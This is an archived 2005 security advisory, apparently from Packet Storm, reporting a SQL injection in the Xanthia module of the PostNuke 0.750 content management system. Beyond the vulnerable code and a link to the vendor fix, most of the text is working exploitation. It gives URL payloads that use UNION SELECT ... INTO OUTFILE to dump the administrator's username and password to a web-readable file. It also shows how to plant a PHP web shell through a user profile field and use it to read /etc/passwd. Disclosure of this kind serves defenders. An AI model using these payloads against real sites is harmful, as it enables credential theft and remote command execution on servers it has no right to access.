postnuke0750.txt

2005-08-14T00:00:00
ID PACKETSTORM:39290
Type packetstorm
Reporter Maksymilian Arciemowicz
Modified 2005-08-14T00:00:00

Description

                                        
                                            `  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PostNuke SQL Injection 0.750=>x cXIb8O3.5]  
  
Author: cXIb8O3  
Date: 2.3.2005  
from SecurityReason.Com  
  
- --- 0.Description ---  
  
PostNuke: The Phoenix Release (0.750)  
  
PostNuke is an open source, open developement content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
- --- 1. Sql Injection ---  
This sql injection exist in modules/Xanthia/pnclasses/Xanthia.php on line 977 on function init_template()  
  
Vulnerabilities code:  
- -965-980---  
$sql = "SELECT $blcontrolcolumn[blocktemplate] as blocktemplate,  
$blcontrolcolumn[identi] as identi  
FROM $pntable[theme_blcontrol]  
WHERE $blcontrolcolumn[theme]='$theme'  
AND $blcontrolcolumn[module]='$mod'  
AND $blcontrolcolumn[blocktemplate] !=''";  
  
// Execute the query  
$result =& $dbconn->Execute($sql);  
  
$blocktemplates = array();  
while(!$result->EOF) {  
$row = $result->GetRowAssoc(false);  
$blocktemplates[] = $row;  
$result->MoveNext();  
}  
- -965-980---  
  
Error exists in varible $mod =>(GET) name.  
But you don't can see result..  
  
Error:  
If you are user right and have you function init_template() active go to:  
  
http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index  
  
Error message :  
- ---------------  
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977  
- ---------------  
  
OR   
  
http://[HOST]/[DIR]/modules.php?op=modload&name=sp3x&file=index&module='cXIb8O3  
  
Error message :  
- ---------------  
Fatal error: Call to a member function MoveNext() on a non-object in /www/PostNuke-0.750/html/modules/Xanthia/pnclasses/Xanthia.php on line 977  
- ---------------  
  
Ok. Frist exploit.  
  
  
Exploit 0[GET Admin Pass]  
Chech dir for PostNuke.   
  
http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index  
  
Error message :  
- ---------------  
Fatal error: Call to a member function GetRowAssoc() on a non-object in /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php on line 977  
- ---------------  
  
For exemple prefix is /www/PostNuke-0.750/source/html/.   
Now you can make exploit. But you have to know db prefix.  
  
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view  
  
and error messege is:  
  
Error message :  
- ---------------  
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE pn_uid=2 INTO OUTFILE '/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: "view")  
- ---------------  
  
But go now to   
  
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3  
  
and have you password for user with id=2.  
  
  
Exploit1[Blind upload]  
Go to:  
  
http://[HOST]/[DIR]/user.php?op=edituser  
  
and insert to "Extra information" php code. For exemeple:  
  
- ---  
<?php system($_GET[cXIb8O3]); ?>  
- ---  
  
And now you can make php script with this code. For exemple:  
  
http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view  
  
and go to:  
  
http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd  
  
- --- 2. How to fix ---  
PNSA 2005-2  
Security Fix (changed files only) for PostNuke 0.750 (tar.gz format)  
http://news.postnuke.com/Downloads-index-req-viewdownloaddetails-lid-471.html  
SHA1: 6e76d92124c833618d02dfdb87d699374120967d  
MD5: a007e741be11389a986b1d8928a6c0e5  
Size: 160550 Bytes  
  
or CVS  
  
- --- 3. Greets ---  
  
sp3x  
  
- --- 4.Contact ---  
Author: Maksymilian Arciemowicz  
Email: max [at] jestsuper [dot] pl  
GPG-KEY: http://securityreason.com  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCjunXznmvyJCR4zQRAjFkAJ4lDoD/zYP3lFZD07XsR9WyftT7vACgjRPr  
oAXlzjom7BH7yzDRybeHjDM=  
=RlgM  
-----END PGP SIGNATURE-----  
`